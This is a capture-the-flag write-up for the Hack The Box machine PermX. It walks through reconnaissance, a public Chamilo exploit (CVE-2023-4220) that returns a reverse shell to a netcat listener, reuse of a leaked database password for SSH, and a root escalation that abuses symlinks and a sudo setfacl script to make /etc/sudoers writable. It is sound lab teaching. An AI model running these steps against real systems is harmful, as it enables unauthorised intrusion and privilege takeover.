PermX is an Easy Linux Box proposed on HTB. I really enjoyed it and I think it’s a good machine for beginners to see some techniques and to think out of the box. Let’s get started!
Reconnaissance π
nmap π
First thing, I launched an nmap scan with nmap -sV -sC -oN tcpscan 10.10.11.23 -p- and I added -p to be sure to not miss any strange TCP ports
Nmap scan report for permx.htb (10.10.11.23)
Host is up (0.015s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_ 256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: eLEARNING
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nothing much, we’ve got a webserver running on port 80, let’s see what it holds for us.
Opening the IP on a browser, we are redirected to http://permx.htb. In order to be able to access the site we need to modify our /etc/hosts file to map the IP to permx.htb. Once that is done we access a simple website of e-learning. After spending some time looking around the site for a login form or something interactive, I found nothing, I decided to launch a subdomain enumeration.
Subdomain Enumeration π
I’m using ffuf for my subdomain enumeration task with the following command:
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://permx.htb -H "Host: FUZZ.permx.htb" -mc 200
After a bit, we have a hit on the lms subdomain, which means there is a site hosted at lms.permx.htb, we promptly add this to our hosts file to be able to access it in a browser.
Exploitation π
Shell as www-data π
We’re welcomed on what seems to be a Learning Management System called Chamilo and presenting us a login form, I tried some default credentials but this yielded nothing but errors.
So I went on and searched for an exploit for Chamilo and found this repository exploiting CVE-2023-4220.
I downloaded the code and ran it against the Chamilo instance, providing the script the necessary information (host to connect back to, port to connect back to, name of the shell, name of the webshell) while spawning a nectat reverse shell (nc -lvnp 4242) in order to catch the shell executed by the exploit.
We get a shell as www-data!, my usual next step after getting an initial shell is looking for passwords that may be re-used. We know that the user is mtz by looking in /home. Fiddling around the different configurations file of Chamilo we can find the following code:
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
in /var/www/chamilo/app/config/configuration.php.
Shell as mtz π
We immediately try to connect to SSH with the username mtz and the password 03F6lY3uXAP2bkW8… and it’s a match! We have a shell as mtz. And we can read user.txt, getting the first flag.
Shell as root π
I usually check the output of sudo -l because it can be a source of easy privilege escalation. This is what we got:
User mtz may run the following commands on permx:
(ALL : ALL) NOPASSWD: /opt/acl.sh
We can execute /opt/acl.sh as root, let’s see what this script is all about
#!/bin/bash
if [ "$#" -ne 3 ]; then
/usr/bin/echo "Usage: $0 user perm file"
exit 1
fi
user="$1"
perm="$2"
target="$3"
if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
/usr/bin/echo "Access denied."
exit 1
fi
# Check if the path is a file
if [ ! -f "$target" ]; then
/usr/bin/echo "Target must be a file."
exit 1
fi
/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"
So basically the script allows us to modify the permissions of any file under /home/mtz/. And we cannot deflect this with the use of path traversal dots because the script do not allow them.
The solution π
We can make use of symbolic links (kinda like a shortcut on Windows) to create a symbolic link to / and then modify the permissions of the /etc/sudoers file for finally running a shell as root.
- We create a symbolic link to the root of the system inside the
/home/mtzfolder:ln -s / /home/mtz/hello - Then we can craft our payload
sudo /opt/acl.sh mtz rwx /home/mtz/hello/etc/sudoers - Now we can edit the sudoers file with this line:
mtz ALL=(ALL:ALL) ALL - We can now get a shell as root just by using
sudo bashand we can retrieve the root.txt flag withcat
Thank you for following this post :)